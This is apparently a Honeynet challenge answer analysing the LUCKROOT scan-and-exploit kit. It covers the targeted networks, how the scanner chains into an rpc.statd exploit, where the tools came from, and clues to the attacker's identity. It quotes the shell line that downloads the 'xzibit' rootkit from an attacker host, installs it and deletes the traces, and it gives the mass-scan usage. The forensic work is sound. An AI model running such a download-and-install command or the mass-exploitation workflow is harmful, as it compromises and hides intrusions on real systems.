1. What is the blackhat attempting to do with his command line syntax?

The intruder creates an obscure directory as a workspace (/usr/sbin/.mail)
and downloads the LUCKROOT toolset from another web server under control of
the attacker (becys.org). The filename is misleading as it is actually a gziped
tar (.tar.gz or .tgz). The intruder extracts the tools and runs the luckgo script
several times against various networks. The networks targeted were most likely
randomly entered, however they map to the following:

command typed

network attacked

who owns it?

./luckgo 216 210

216.210.0.0/16

TotalNet Inc.

./luckgo 200 120

200.120.0.0/16

unallocated

./luckgo 64 120

64.120.0.0/16

unallocated

./luckgo 216 200

216.200.0.0/16

Abovenet Communications, Inc.

./luckgo 200 120

repeat

./luckgo 63 1

64.1.0.0/16

UUNET Technologies, Inc.

./luckgo 216 10

216.10.0.0/16

many class c allocations (various)

./luckgo 210 120

210.120.0.0/16

many class c allocations (Korean)

./luckgo 64 1

64.1.0.0/16

unallocated

./luckgo 216 1

216.1.0.0/16

several class c allocations

./luckgo 194 1

194.1.0.0/16

many class c allocations (Slovak Republic)

./luckgo 216 1

repeat

./luckgo 210 128

210.128.0.0/16

many class c allocations (Japan)

./luckgo 24 1

24.1.0.0/16

@Home Network (numerous regions)

./luckgo 12 20

12.20.0.0/16

many class c allocations (ATT)

Notice that the attacker would have scanned roughly 196k unallocated
IP's (and 65k of those scanned twice) had the Honeynet firewall allowed the
outbound connections, a considerable waste of resources and a clear illustration
that much of the script kiddie behavior is random. Worse still, though less
illustrative of their inefficiency, is that they would have scanned roughly
655k IPs in allocated space, possibly compromising hundreds of machines. A complete
lists of affected networks is available upon request (vision@whitehats.com),
but anyone can look these allocations up from ARIN.

shell script
Runs luckscan-a against a network address range specified at the command
line. If luckscan-a and luckstatdx program binaries are not present,
this script will detect this and try to compile them from souce. If
a scan.log file is present it is deleted.

c source and binary
Network scanner that sweeps the specified IP range for a particular
server using tcp connect (noisy full-connection). When called from
the luckgo script, it will always scan for the portmap service at
port 111. Each time the scanner finds a host running portmap, it launches
luckstatdx passing the target IP as a parameter. (./luckstatdx -d
0 TARGET)

c source and binary
Rpc.statd remote exploit that can be used to run arbitrary code on
the target server. When called from luckscan-a, this exploit will
always use the default settings to attack Redhat 6.2. Upon gaining
access on the target server, luckstatdx runs the following shell commands,
which effectively trojan the remote system:
cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar
-zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz

3. How does the tool work?

luckgo is a shell script that runs the scanner against a target network. The
attacker runs the luckgo script with the first two octets of their intended
victim network as the parameter. For example if they wished to scan and exploit
10.10.0.0/16, they would type "./luckgo 10 10". luckgo runs the scanner
luckscan-a, which in turn runs the exploit luckstatdx against each target IP
that is determined to have the portmap service running. The scanner makes no
attempt to determine the operating system type or version before launching the
exploit, so this shotgun approach is basically a blind mass-attack.

When a vulnerable target is found, the rpc.statd exploit is run against the
host causing certain shell commands to be run on the remote server. These commands
cause the victim to download and install a rootkit called "xzibit",
which replaces system commands with the intention of hiding the intruder's presense
and allowing remote access.

4. Is this tool a worm, or would you classify it as something else?

LUCKROOT is not a worm because it lacks an automated infection mechanism. This
tool is used manually by an attacker to scan large network blocks for the rpc.statd
vulnerability and exploit potential targets. This tool is a "scripted scan
and exploit package".

5. Is this tool original, or is it simply based on previous tools? If based
on previous tools, which ones and what is modified?

All tools in the LUCKROOT package are slight variations of existing tools.
In the underground community this is called "ripping" and is an all-too-often
occurance where one person takes "credit" for the work of another.

June 2000. Shell script included in VetesGirl's scanning tools
that can be seen at http://www.self-evident.com/exploits/vetes/.
There are several tool packages each with a different name, but
using the same code. For example look at amdscanner.tar.gz for the
file "/amd/massa/ama" and compare to luckgo.

The author credits were changed from "VetesGirl" to "BeCyS",
and there were slight changes to the names of each program.

June 2000. C program also included in VetesGirl's scanning tools
from http://www.self-evident.com/exploits/vetes/. Using the same example
from above, you can look at the file "/amd/massa/pscan-a.c"
from amdscanner.tar.gz and compare to luckscan-a.c.

Instead of just displaying which targets have the open port, the
program now exploits each target as well.

August 2000. rpc.statd exploit written by ron1n, posted to Bugtraq
as statdx.c.
http://www.securityfocus.com/archive/1/74148
Note that this is the old version of the exploit, there have been
several other exploits since including an update from ron1n called
statdx2.c, but for some reason attackers only seem to be using the
older version.

Author credits have been changed from "ron1n" to "becys"
and the commands run on the exploited target host have been altered
to instead retrieve and install a rootkit.

Bonus Question:
What information can you obtain about who is using or created the tool?

The source IP address used in the attack wasn't shown in the challenge, but
there are numerous clues to consider about the tool author from analysis of
the tool.

Where the tools came from: The LUCKROOT.TAR package is downloaded from becys.org,
a site which has only a shockwave intro with no further content. Inspection
of the domain record shows that the domain was created last year using suspicious
information - for example I called the contact phone number listed and the person
had no idea about the becys.org domain. The contact address becys@yahoo.com
address shows up in the domain record and becys@becys.org in the attack tool.
Since the rootkit is still available for download from becys.org, it is somewhat
likely that this host is controlled by the attacker (apparently BeCyS).

Credits in the attack tools: BeCyS, ReSpEkT, and coSes are mentioned in the
tools as authors or references. I looked for each name in the large IRC networks,
and found ReSpEkT on Undernet. I asked about BeCyS and through five minutes
conversation was told that there are feuds between them and that BeCyS may have
dropped ReSpEkT's name to get him in trouble. There was nothing conclusive here
as it may all be the same individual, thought it would imply a higher level
of deception and forethought than is evidenced by the use of the attack tools.
ReSpEkT was in a channel with known Romanian blackhats who we have seen attack
the honeynet before.

Rootkit configuration files: There are some preset variables in the xzibit.tar.gz
rootkit downloaded from becys.org. Three address ranges are specified that will
cause the trojaned system utilities to ignore traffic from certain networks,
which are all in Romainia. One is the Romainian Education Network, and the other
two appears to be .ro ISPs. Again assuming the attacker or attackers lack the
sophistication to employ an elaborate decoy or framing operation, this would
indicate the intruder is connecting from Romainia.